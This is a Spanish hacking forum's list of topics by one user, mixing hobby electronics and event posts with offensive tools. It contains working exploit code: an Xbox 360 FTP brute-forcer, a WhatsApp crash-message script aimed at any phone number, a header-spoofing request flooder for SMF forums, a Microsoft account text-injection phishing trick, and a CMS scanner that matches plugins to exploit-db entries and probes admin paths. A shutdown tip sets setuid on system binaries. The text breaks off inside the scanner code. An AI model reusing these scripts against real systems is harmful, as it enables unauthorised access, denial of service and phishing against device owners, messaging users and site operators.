Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - hielasangre

#1
Que tal? Alguien me podrá ayudar con esto?
el siguiente codigo sirve para prender un televisor samsung con arduino y un emisor ir

Código: php


#include <IRremote.h>

IRsend irsend;

unsigned int S_pwr[68]={4550,4400,550,1700,550,1650,600,1600,600,550,550,550,
600,500,600,500,600,500,650,1600,600,1650,550,1650,600,500,600,550,550,550,600,
500,600,500,600,550,550,1650,600,500,600,550,550,550,600,500,600,500,600,550,550,
1650,600,500,600,1650,550,1650,600,1650,550,1650,600,1650,600,1600,600};

void setup()
{
Serial.begin(9600);
}

void loop() {

irsend.sendRaw(S_pwr,68,38);
delay(3000);

}



El tema es que necesito el rawcode para un aire de ventana de la marca frigidaire y no lo tengo, no tengo el control, mi idea es implementarlo con alexa para que se prenda y se apague



Si salguien sabe donde conseguir el rawcode o tiene uno de estos aires para ver como sacamos el codigo de encendido o apagado.
#2
Buenas tardes, en la maquina que uso para trabajar tengo una sesión abierta del foro, quise abrirla en una que tengo para pentest únicamente y no me funciona en ningún navegador, a alguien más le pasa? No quiero cerrar esta sesión y probar por las dudas que ya no pueda volver a entrar! XD
#3
Hacking / Documentos sobre lockpicking
Julio 18, 2019, 12:09:35 AM

Para los interesados en el arte de abrir cerraduras, les comparto un par de documentos sobre lockpicking para que disfruten.

la clave de cifrado es: LI9zF0XO_MtCq2foNS9nYA

El enlace: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

#4

Código: php
# Exploit Title: XBOX 360 Aurora 0.6b Default Credentials / FTP BruteForce
# Date: 20/12/2017
# Exploit Author: Daniel Godoy
# Vendor Homepage: http://phoenix.xboxunity.net/#/news
# Tested on: XBOX 360
# GREETZ: Iker Legorreta, #RemoteExecution Team



#!/usr/bin/env python
# -*- coding:utf-8 -*-

__author__ = 'Daniel Godoy'

import argparse
import sys
from ftplib import FTP

info = '''
XBOX 360 Aurora 0.6b Default Credentials / FTP BruteForce\n
Usage: ./xbox_ftp_brute_forcer.py [options]\n
Options: -t, --target    <hostname/ip>   |   Target\n
         -u, --user      <user>          |   User\n
         -w, --wordlist  <filename>      |   Wordlist\n
         -h, --help      <help>          |   print help\n

Example: ./xbox_ftp_brute_forcer.py -t 192.168.1.1 -u root -w
/root/Desktop/wordlist.txt
'''


def help():
    print info
    sys.exit(0)


def check_default_login(target):
    try:
        ftp = FTP(target)
        ftp.login('xboxftp', 'xboxftp')
        ftp.quit()
        print "\n[+] Default login is open."
        print "\n[+] Username : xboxftp"
        print "\n[+] Password : xboxftp\n"
        ftp.quit()
    except:
        pass


def ftp_login(target, username, password):
    try:
        ftp = FTP(target)
        ftp.login(username, password)
        ftp.quit()
        print "\n[*] Credentials have found."
        print "\n[*] Username : {}".format(username)
        print "\n[*] Password : {}".format(password)
        return True
    except:
        return False


def brute_force(target, username, wordlist):
    try:
        wordlist = open(wordlist, "r")
        words = wordlist.readlines()
        for word in words:
            word = word.strip()
            if ftp_login(target, username, word):
                break
    except:
        print "\n[-] There is no such wordlist file. \n"
        sys.exit(0)



parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target")
parser.add_argument("-u", "--username")
parser.add_argument("-w", "--wordlist")

args = parser.parse_args()

if not args.target or not args.username or not args.wordlist:
    help()
    sys.exit(0)

target = args.target
username = args.username
wordlist = args.wordlist

brute_force(target, username, wordlist)
check_default_login(target)
print "\n[-] Brute force finished. \n"
#5
Codigo para que funcione con yowsup

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Enlace a Pastebin: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Código: php

#!/usr/bin/python
#-*- coding: utf-8 -*

# Title: WhatsApp Remote Reboot/Crash App Android
# Product: WhatsApp
# Vendor Homepage: http://www.whatsapp.com
# Vulnerable Version(s): 2.11.476
# Tested on: WhatsApp v2.11.476 on MotoG 2014 -Android 4.4.4
# Date: 26/12/2014
# #RemoteExecution - www.remoteexecution.net
#
# Author Exploit:
#   Daniel Godoy       @0xhielasangre    <[email protected]>
# Credits:
#   Gonza Cabrera
#
# Reference: http://foro.remoteexecution.net/index.php/topic,569.0.html
#
# Custom message with non-printable characters will crash any WhatsApp client < v2.11.476 for android.
# It uses Yowsup library, that provides us with the options of registration, reading/sending messages, and even
# engaging in an interactive conversation over WhatsApp protocol
#

import argparse, sys, os, csv
from Yowsup.Common.utilities import Utilities
from Yowsup.Common.debugger import Debugger
from Yowsup.Common.constants import Constants
from Examples.CmdClient import WhatsappCmdClient
from Examples.EchoClient import WhatsappEchoClient
from Examples.ListenerClient import WhatsappListenerClient
from Yowsup.Registration.v1.coderequest import WACodeRequest
from Yowsup.Registration.v1.regrequest import WARegRequest
from Yowsup.Registration.v1.existsrequest import WAExistsRequest
from Yowsup.Registration.v2.existsrequest import WAExistsRequest as WAExistsRequestV2
from Yowsup.Registration.v2.coderequest import WACodeRequest as WACodeRequestV2
from Yowsup.Registration.v2.regrequest import WARegRequest as WARegRequestV2
from Yowsup.Contacts.contacts import WAContactsSyncRequest

import threading,time, base64

DEFAULT_CONFIG = os.path.expanduser("~")+"/.yowsup/auth"
COUNTRIES_CSV = "countries.csv"

DEFAULT_CONFIG = os.path.expanduser("~")+"/.yowsup/auth"


######## Yowsup Configuration file #####################
# Your configuration should contain info about your login credentials to Whatsapp. This typically consist of 3 fields:\n
# phone:    Your full phone number including country code, without '+' or '00'
# id:       This field is used in registration calls (-r|-R|-e), and for login if you are trying to use an existing account that is setup
#       on a physical device. Whatsapp has recently deprecated using IMEI/MAC to generate the account's password in updated versions
#       of their clients. Use --v1 switch to try it anyway. Typically this field should contain the phone's IMEI if your account is setup on
#       a Nokia or an Android device, or the phone's WLAN's MAC Address for iOS devices. If you are not trying to use existing credentials
#       or want to register, you can leave this field blank or set it to some random text.
# password: Password to use for login. You obtain this password when you register using Yowsup.
######################################################
MINE_CONFIG ="config"

def getCredentials(config = DEFAULT_CONFIG):
    if os.path.isfile(config):
        f = open(config)
         
        phone = ""
        idx = ""
        pw = ""
        cc = ""
         
        try:
            for l in f:
                line = l.strip()
                if len(line) and line[0] not in ('#',';'):
                     
                    prep = line.split('#', 1)[0].split(';', 1)[0].split('=', 1)
                     
                    varname = prep[0].strip()
                    val = prep[1].strip()
                     
                    if varname == "phone":
                        phone = val
                    elif varname == "id":
                        idx = val
                    elif varname =="password":
                        pw =val
                    elif varname == "cc":
                        cc = val

            return (cc, phone, idx, pw);
        except:
            pass

    return 0

def main(phone):
    credentials = getCredentials(MINE_CONFIG or DEFAULT_CONFIG )

    if credentials:
         
        countryCode, login, identity, password = credentials
        identity = Utilities.processIdentity(identity)

        password = base64.b64decode(password)

        # Custom message that will crash WhatsApp
        message = message = "#RemoteExecution??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????6?? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????"

        #print countryCode, login, identity, password
        wa = WhatsappEchoClient(phone, message)
        wa.login(login, password)
     
if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("number", help="Phone number to send the crash message")
    parser.add_argument("-v", "--verbose", help="increase output verbosity", action="store_true")
    args = parser.parse_args()

    Debugger.enabled = args.verbose
    main(args.number)
#6
Back-end / [PHP][Geo - #RemoteExecution]
Septiembre 29, 2014, 12:54:45 PM
Hace mucho tiempo que existe una web llamada No tienes permitido ver los links. Registrarse o Entrar a mi cuenta donde uno ingresando la característica y número de un teléfono celular o fijo nos da la información sobre la empresa,localidad,modalidad,etc...
Estos datos se podían bajar en un archivo .xls de la Comisión Nacional de Comunicaciones (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta)
Tenia la Base de Datos hace algún tiempo y por fin me decidí a darle un uso al que se le pueda sacar provecho.
Aquí les dejo todo lo necesario para implementar este sistema en sus webs.
Aclaro que el sistema es solo valido para Argentina y también recomiendo incorporar un captcha si es que lo van a dejar para uso publico



PD: La captura es de una versión vieja que tenia y que modifique anoche.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Nota: Voy a actualizar el script porque lo hice a las apuradas. Saludos!

PD: Como dije por ahí , mis post no dicen "Fuente: ESET Latinoamerica xD"
#7
Python / SMF Incorrect Flood Filter Headers
Agosto 21, 2014, 10:49:25 PM








Código: python

#!/usr/bin/python
# RemoteExecution
#Autor: Daniel Godoy A.K.A hielasangre

import sys, threading, time, urllib2,re
print "Ingrese URL: "
url = raw_input()
a = b = c = d = 1
count = 0
class SMFPwner(threading.Thread):
  def __init__(self, num):
      threading.Thread.__init__(self)
      self.num = num     
  def run(self):
    while 1:
        global a,b,c,d,count, url
        data = ""
        while 1:
            while 1:
                if d!=250:
                    d+=1
                else:
                    if c!= 250:
                        c+=2
                        d=0
                    else:
                        if b!=250:
                            c=0
                            d=0
                            b+=1
                        else:
                            a+=1
                            b=0
                            c=0
                            d=0
                head = str(a)+'.'+str(b)+'.'+str(c)+'.'+str(d)
                headers = { 'X-Forwarded-For' : head }
                req = urllib2.Request(url, data, headers)
                f = urllib2.urlopen(req)
                count += 1
                print "[ Visitando => " + url + " Por " + str(count) +" vez ]"
for i in range(3):   
ta = SMFPwner(i)
ta.start()


Si bien no es una vulnerabilidad comprometedora, nos permite promocionar entre los primeros puestos (estadísticas) a nuestros posts, de manera arbitraria... Lo cual al menos, resulta divertido.

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#8
Off Topic / Puntos de vista
Mayo 16, 2014, 10:15:40 PM
Bueno empiezo este post y vamos a ver como sale.
Me dirijo a ustedes usuarios de underc0de y staff, para hacerles una pregunta sin ánimos de ofender o atacar.
Ayer tuve un entredicho con un usuario del foro, que en realidad salto como leche hervida :P sacando eso, me preocupo su contestación.



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

En serio esa es la mentalidad de este foro íntegramente? Ustedes comparten esa manera de pensar?  No se aceptan opiniones en los post de ese tipo? Esto es acaso no es un foro? Que tiene que exprese mi opinión, no creo haber hecho uso de malas palabras...Reconozco que a lo mejor mi apreciación personal en cuanto a la capacidad haya sido un poco molesta, pero en eso si hago mea culpa.
Sin embargo creo que una persona que es del staff de un foro en donde se invita a compartir y aprender, no es la forma de dirigirse a un usuario del foro, a mi personalmente poco me importa si me corren o no de underc0de, pero si la intención de ustedes es crecer, pondría a ver algunas cuestiones...
En fin hago este post porque me dijo que cualquier queja la haga en otro post, aunque puntualmente no es una queja, sino mas bien una critica (Espero que constructiva)

Ahora por otro lado, espero que si alguien me va a corregir.. Comprenda la manera correcta de escribir, ya que el "haber haber" es de existencia (osea algo que "HAY") y el a ver, a ver... Seria algo así como diciendo ... "Mirá, mira.." Se entiende?

Otra cosa que me gustaría remarcar es el comentario en cuanto a los post tengo 77 post, si y como le dije a ANTRAX, entrare a postear cada vez que pueda ayudar o que pueda hacer algo diferente no hacer algo copy & paste y debajo poner : ESET Latinoamerica o algo por el estilo... Para ir redondeando, me gustaría que si a alguien no le gusta el post, lo borre y también se deshaga de mi usuario.. Ya que no me interesa participar de una comunidad donde se censura a lo usuarios :)

Antes de cerrar este post, debo agradecer a Alan++ por hacerme ver un par de cosas, y animarme a que escriba este post :)
Saludos a los users, y perdonen si les hago perder un poco de tiempo :)
__EOF__
#9
Off Topic / RFID / NFC Workshop
Abril 12, 2014, 08:57:23 PM
RFID/NFC Course
"Algunos van a Tecnópolis, nosotros vamos a aprender algo..."
Sábado 17 de Mayo.
De 9 a 18.
Microcentro, Sala de Meetings
Cupo: 24 asientos.
Descuento por pago durante Mes de Abril.

Abierta la inscripción.
Consultas: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Temario: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
(traé pochoclo)

Gracias por compartir!

PD: Lo hice y por eso recomiendo el workshop, si alguno quiere mencione que leyo de mi parte (Daniel Godoy) sobre el curso, se le hara descuento  ;)
Saludos, y aprovechen que se acaban las vacantes al toque!  '^^
#10
GNU/Linux / Apagar la PC sin tener que ser ROOT
Marzo 28, 2014, 02:42:56 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Bueno, aclaro que esto lo probe en slackware 14.1, Pero eh de suponer que funciona en las demas distros de GNU/Linux, si alguien se anima a probar y comentarlo mejor.

Hace algún tiempo vengo usando openbox (ganas de complicarme) y la verdad que estoy bastante contento con el resultado estético que logre.

Como no pude encontrar ningún paquete o similar que contenga la gestión de apagado/reinicio del equipo hice un script para facilitarme esto.





Para usar el mismo lo primero que tuve que hacer es:

Creamos un grupo que va  a tener privilegios para apagar el equipo:
Código: php

groupadd apagado


Ya teniéndolo listo metemos los usuarios que deseemos que puedan apagar el equipo:
Código: php

gpasswd -a hielasangre apagado


Ahora Cambiamos el grupo de los comandos Halt , Reboot , ShutDown:
Código: php
chgrp Apagado /sbin/shutdown /sbin/reboot /sbin/halt


Cambiamos los permisos de los anteriores comandos:
Código: php
chmod u+s,o-rwx /sbin/shutdown /sbin/reboot /sbin/halt


Creamos los enlaces simbólicos para que los comandos estén en el PATH del usuario:
Código: php
ln -s /sbin/halt /usr/bin/halt
ln -s /sbin/reboot /usr/bin/reboot
ln -s /sbin/shutdown /usr/bin/shutdown



Y para simplificar aun mas la tarea hice este script (para que funcione, deben tener instalado gxmessage):

Código: php

#!/bin/bash

gxmessage "Elegir alguna de las opciones" -center -title "Que desea hacer?" -font "OCR A Std 10" -default "Cancelar" -buttons "_Cancelar":1,"_Reiniciar":2,"_Apagar":3,

case $? in

1) echo "Exit";;
2) /usr/bin/shutdown -r now;;
3) /usr/bin/shutdown -h now;;

esac


Y listo, ya podemos adjuntar a nuestras opciones de menú de usuario  ;)
#11
SASO Conf

Primera Conferencia de Informática en Curuzú Cuatiá

Software Libre, Redes Libres & Seguridad

Viernes 14 y Sábado 15 de Marzo 2014

Registrarse para poder asistir al envento.

La palabra "libre" siempre ha acompañado a nombres de redes y aplicaciones libres, es por eso que para no salirnos del marco identificativo hemos optado por usar como nombre "sãso" el cual significa "libre" en nuestro tradicional idioma Guaraní.



Actividades:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#12
Electrónica y Robótica / Proyecto Pinguino
Marzo 04, 2014, 06:32:29 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Pinguino es una plataforma similar a Arduino, y compatible con ella, pero basada en los micro-controladores PIC Microchip de 8 o 32 bits. Ademas, Pinguino se trata de hardware y software abierto. La meta de este proyecto es construir un IDE (Ambiente de Desarrollo Integrado, por sus siglas en ingles) el cual sea fácil de usar en GNU/Linux, Windows y Mac OS X. Arduino es una herramienta poderosa, pero tiene algunos defectos. Uno de estos inconvenientes es que no posee una interfaz USB nativa en el chip, limitando algunas de sus posibilidades. Ademas tiene menor variedad de periféricos integrados en el micro.

Instalar las bibliotecas:

Código: php

libusb-1.0-0
python-wxgtk2.8
python-usb



Este script use para instalar el IDE de pinguino en slackware 14.1 si alguien le sirve dejo el script.

Código: php

#!/bin/sh
# Script para instalar Pinguino IDE version beta 7 in Slackware 14.1
# Daniel Godoy : [email protected]

wget http://www.delincuentedigital.com.ar/pinguino%20beta%207/pinguino%20beta7%20linux%20.tar.gz

echo ------------------- "Creando Directorio"

mkdir pinguino 2>/dev/null
mv pinguino\ beta7\ linux\ .tar.gz pinguino/
cd pinguino


echo ------------------- "Desembalaje de archivos y eliminacion de el archivo .tar"

tar xzf pinguino\ beta7\ linux\ .tar.gz
rm pinguino\ beta7\ linux\ .tar.gz


echo ------------------- "Creando Permisos"

sudo groupadd microchip 2>/dev/null
sudo usermod -a -G microchip $USER


cd pinguino\ beta7\ linux\ /

sudo cp 41-microchip.rules /etc/udev/rules.d/
sudo cp 26-microchip.rules /etc/udev/rules.d/

echo ------------------- "Pinguino IDE instalado!"



Info del proyecto:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Los materiales para construir son estos:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

NOTA: yo no encontraba todos los elementos ( y ahorre en algunos por eso por ahi la placa no se ve igual a la mia :P )







UPDATE: Les recomiendo un ide mucho mas completo!!!

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#13

Muy buena nota en CQC que les dejo para el que no la pudo ver o que quiere volver a verla :D
#14
Después de mucho tiempo sin escribir voy a hacer un post sencillo y breve...
El ataque no es algo muy elaborado, pero el ataque es viable por medio de una variable (donde se especifica el correo al cual se envía la información cuando uno intenta resetear su clave)


El enlace es:

Código: php
https://account.live.com/MessagePage.aspx?message=autocsrsuccess&[email protected]

Texto donde figura el correo electronico que aparece en la url:

Código: php
Enviaremos un mensaje de correo electrónico a [email protected] para informarle si brindó suficiente información para recuperar su cuenta. Generalmente se necesitan alrededor de 24 horas para revisar la información enviada. Si ya envió una solicitud, la cerraremos y echaremos un vistazo en esta.


Si agregamos texto después del correo electrónico, podemos "alterar" el contenido de la web. Esto facilitaría a un atacante, que ingrese una url (solo en texto plano, ya que la web no permite tags html) engañando a la victima para que le facilite datos sensibles para el posterior robo de credenciales.

Por ejemplo, se podría realizar un ataque modificando la url y con un poco de ingenio dejarlo de la siguiente manera:

Eso es todo.

#RemoteExecution 2014
__EOF__
#15
Esta herramienta la tengo algo olvidada, prometo actualizarla dentro de poco.

Acá dejo el código que empeze el sábado pasado y hoy retome, la idea es hacer una especie de scanner que identifique que cms (por ahora joomla o wordpress) y nos busque en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta el enlace en el caso de que haya algún exploit para los módulos o plugins afectados... Como dije esta en desarrollo, le falta mucho todavia, pero esta alpha me va a permitir corregir algunos detalles, me gustaría que lo prueben y comenten.
Para una próxima actualización la idea es buscar las fallas mas conocidas como ser lfi,rfi,xss,sqli para el caso de webs que no sean cms como los citados anteriormente, también busca los directorios que mas nos interesan (phpmyadmin,admin,etc...)







Código: php

<?php
/*
*     
*     
*      Copyright 2012 hielasangre <hielasangre@fuckingmachine>
*     
*      This program is free software; you can redistribute it and/or modify
*      it under the terms of the GNU General Public License as published by
*      the Free Software Foundation; either version 2 of the License, or
*      (at your option) any later version.
*     
*      This program is distributed in the hope that it will be useful,
*      but WITHOUT ANY WARRANTY; without even the implied warranty of
*      MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
*      GNU General Public License for more details.
*     
*      You should have received a copy of the GNU General Public License
*      along with this program; if not, write to the Free Software
*      Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
*      MA 02110-1301, USA.
*/
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
  "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>[#Beastie - Multiple CMS Scaner - Toolkit]</title>
<style>
body
{
background: #1a1a1a;
}
#resultados
{
background: #161616;
text-align: left;
padding:3px;

}
#textarea
{
overflow-x: scroll;
overflow-y: hidden;
background: #000;
border-style:solid;
border-color: #CCC;
border-width: 2px;
}
#contenedor
{
margin-left:auto;
margin-right:auto;
padding: 25px;
width:800px;
color:#FFF;
background: #161616;
border-style:solid;
border-color: #101010;
border-width: 5px;
background: #1a1a1a;
margin: 5px 0 5px 0;
border-radius:7px;
-moz-border-radius: 7px;
-webkit-border-radius : 7px;
}
input,textarea,select
{
background-color: black;
margin:6px 0 3px 0;
color: #FFF;
font-family: courier new;
font-size: 18px;
border: solid 1px #555;
}
.chico
{
text-align: center;
font-size: 10px;
font-family: Tahoma;
}
#resultados a:visited
{
color:#CCC;
text-decoration: none;
}
#resultados a:link
{
color:#CCC;
text-decoration: none;
}
#resultados a:hover
{
color:#FF0000;
text-decoration: none;
}

td.resultados
{
width: 798px;
border-style:solid;
border-color: #555;
border-width: 1px;
}
td.resultados:hover
{
background-color:#000;
text-decoration: none;
}

#paginador a:visited
{
font-size:18px;
color:#CCC;
text-decoration: none;
}
#paginador a:link
{
font-size:18px;
color:#CCC;
text-decoration: none;
}
#paginador a:hover
{
font-size:18px;
color:#FF0000;
text-decoration: none;
}

</style>
<meta http-equiv="content-type" content="text/html;charset=utf-8" />
</head>
<body>
<center>
<div id="contenedor">
     <img src="http://www.remoteexecution.info/img/logo.png">
<form action="" method="post">
<table>
<tr>
<td colspan="2"><input type="text" name="target" size="70"/></td>
</tr>
<tr>
<td class="chico" colspan="2" width="100%">Ingrese URL.</td>
</tr>
<tr>
<td width="50%" ></td>
<td width="50%" align="right"><input type="submit" name="submit" value="Test! >" /></td>
</tr>
</table>
</form>
<?php
$target = strip_tags(trim($_POST['target']));
if(isset($target) && ($target!=''))
{
  $ch = curl_init();
              curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
              curl_setopt($ch, CURLOPT_HEADER, 1);
              curl_setopt($ch, CURLOPT_URL, $target);
              $result = curl_exec($ch);
  curl_close($ch);
  $cabeceras = explode("\n\r\n", $result);
  $headers = $cabeceras[0];
  function identificar($target)
{
    $joomla = $target."/administrator/";
$fp = curl_init($joomla);
$ret = curl_setopt($fp, CURLOPT_RETURNTRANSFER, 1);
$ret = curl_setopt($fp, CURLOPT_TIMEOUT, 30);
$ret = curl_exec($fp);
$info = curl_getinfo($fp, CURLINFO_HTTP_CODE);
curl_close($fp);
if($info == 200)
{
echo 'El sistema base es: <a href="http://www.joomla.org/" target="_blank">Joomla!</a><br/>';
global $cms;
$cms = "1";
}
$wordpress = $target."/wp-login.php";
$fp = curl_init($wordpress);
$ret = curl_setopt($fp, CURLOPT_RETURNTRANSFER, 1);
$ret = curl_setopt($fp, CURLOPT_TIMEOUT, 30);
$ret = curl_exec($fp);
$info = curl_getinfo($fp, CURLINFO_HTTP_CODE);
curl_close($fp);
if($info == 200)
{
echo 'El sistema base es: <a href="http://wordpress.org/" target="_blank">Wordpress</a>';
global $cms;
$cms = "2";
}
}
function edb($componente)
{
$exploitdb ="http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$componente&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=";
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_URL, $exploitdb);
$fuente= curl_exec($ch);
curl_close($ch);
if (preg_match("/No results/",$fuente)) 
{
ob_flush();
echo '<tr><td class="resultados">'.$componente.'</td></tr>';
flush();
}
else{
if($componente!=' ')
{
ob_flush();
echo '<tr><td class="resultados"><a href="'.$exploitdb.'" target="_blank">'.$componente.'</a></td></tr>';
flush();
}
}
}
function wp_plugins($result)
{
preg_match_all("#/plugins/(.*?)/#i", $result, $f);
$plugins=array_unique($f[1]);
if(count($plugins)==0)
{
ob_flush();
echo '<td class="resultados ">No fue posible encontrar nada relacionado a este CMS</td><br>';
flush();
}
foreach($plugins as $plugin)
{
edb($plugin);
}
}
function joomla_components($site)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_URL, $site);
$source= curl_exec($ch);
curl_close($ch);
preg_match_all('{option,(.*?)/}i',$source,$f);
preg_match_all('{option=(.*?)(&amp;|&|")}i',$source,$f2);
preg_match_all('{/components/(.*?)/}i',$source,$f3);
$arreglo=array_merge($f2[1],$f[1],$f3[1]);
$componentes=array();
if(count($arreglo)==0)
{
ob_flush();
echo '<td class="resultados ">No fue posible encontrar nada relacionado a este CMS</td>"';
flush();
}
foreach(array_unique($arreglo) as $x)
{
$componentes[]=$x;
}
foreach($componentes as $componente_encontrado)
{
edb($componente_encontrado);
}
}
              if (preg_match("/200 OK/", $result))
{
                     echo '<div id="resultados">';
                     echo 'El sitio ingresado (<a href="'.$target.'" target="_blank">'.$target.'</a>) devuelve: <br/>';
                     echo '<div id="textarea"><pre>'.htmlentities($headers).'</pre></div><br/>';
                     identificar($target);
                     echo '<table>';
if($cms == "1")
{
joomla_components($target);
}
if($cms == "2")
{
wp_plugins($result);
}
                     echo '</table>';
                     echo '</div><br>';
                     $list = array('/phpMyAdmin/', '/phpmyadmin/','/PMA/','/pma/','/admin/','/dbadmin/','/mysql/', '/myadmin/', '/phpmyadmin2/','/phpMyAdmin2/', '/phpMyAdmin-2/',
   '/php-my-admin/','/phpMyAdmin-2.2.3/', '/phpMyAdmin-2.2.6/', '/phpMyAdmin-2.5.1/', '/phpMyAdmin-2.5.4/', '/phpMyAdmin-2.5.5-rc1/',
   '/phpMyAdmin-2.5.5-rc2/', '/phpMyAdmin-2.5.5/', '/phpMyAdmin-2.5.5-pl1/', '/phpMyAdmin-2.5.6-rc1/', '/phpMyAdmin-2.5.6-rc2/', '/phpMyAdmin-2.5.6/',
                                   '/phpMyAdmin-2.5.7/', '/phpMyAdmin-2.5.7-pl1/', '/phpMyAdmin-2.6.0-alpha/', '/phpMyAdmin-2.6.0-alpha2/', '/phpMyAdmin-2.6.0-beta1/',
                                   '/phpMyAdmin-2.6.0-beta2/', '/phpMyAdmin-2.6.0-rc1/', '/phpMyAdmin-2.6.0-rc2/', '/phpMyAdmin-2.6.0-rc3/','/phpMyAdmin-2.6.0/',
                                   '/phpMyAdmin-2.6.0-pl1/', '/phpMyAdmin-2.6.0-pl2/', '/phpMyAdmin-2.6.0-pl3/', '/phpMyAdmin-2.6.1-rc1/', '/phpMyAdmin-2.6.1-rc2/',
                                   '/phpMyAdmin-2.6.1/', '/phpMyAdmin-2.6.1-pl1/', '/phpMyAdmin-2.6.1-pl2/', '/phpMyAdmin-2.6.1-pl3/','/phpMyAdmin-2.6.2-rc1/',
                                   '/phpMyAdmin-2.6.2-beta1/', '/phpMyAdmin-2.6.2-rc1/', '/phpMyAdmin-2.6.2/', '/phpMyAdmin-2.6.2-pl1/', '/phpMyAdmin-2.6.3/',
                                   '/phpMyAdmin-2.6.3-rc1/', '/phpMyAdmin-2.6.3/', '/phpMyAdmin-2.6.3-pl1/', '/phpMyAdmin-2.6.4-rc1/', '/phpMyAdmin-2.6.4-pl1/',
